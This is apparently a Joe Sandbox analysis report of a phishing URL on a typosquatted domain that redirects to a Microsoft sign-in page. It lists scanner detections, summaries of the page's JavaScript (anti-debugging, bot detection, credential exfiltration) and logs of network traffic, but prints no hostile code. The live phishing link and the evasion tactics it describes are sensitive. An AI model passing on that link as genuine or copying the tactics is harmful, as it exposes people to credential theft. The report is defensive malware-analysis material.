Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t

Overview

General Information

Sample URL:https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t
Analysis ID:1585551
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
AI detected suspicious URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 6288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2008,i,2198589469627918427,17231179817136135105,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 5640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tAvira URL Cloud: detection malicious, Label: phishing
Source: https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://brh5.bughtswo.com/favicon.icoAvira URL Cloud: Label: phishing
Source: https://brh5.bughtswo.com/tgs0/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://brh5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZW... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of evading detection and potentially carrying out phishing or other malicious activities.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://brh5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZW... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It collects user data and credentials, and then sends that data to an unknown external domain. The script also attempts to bypass form submission, indicating malicious intent. Overall, this script demonstrates a high level of risk and should be treated as potentially malicious.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://brh5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZW... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. While some of the behaviors may be related to legitimate functionality like analytics or error reporting, the overall level of obfuscation and suspicious activity suggests a high-risk script that requires further investigation.
Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://bRH5.bughtswo.com
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 9f226a25-7fde-4852-9288-05200684a1ef73c560dc-056e-4426-a0a8-d02567e041c0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://brh5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49742 version: TLS 1.0
Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49742 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /tgs0/ HTTP/1.1Host: brh5.bughtswo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
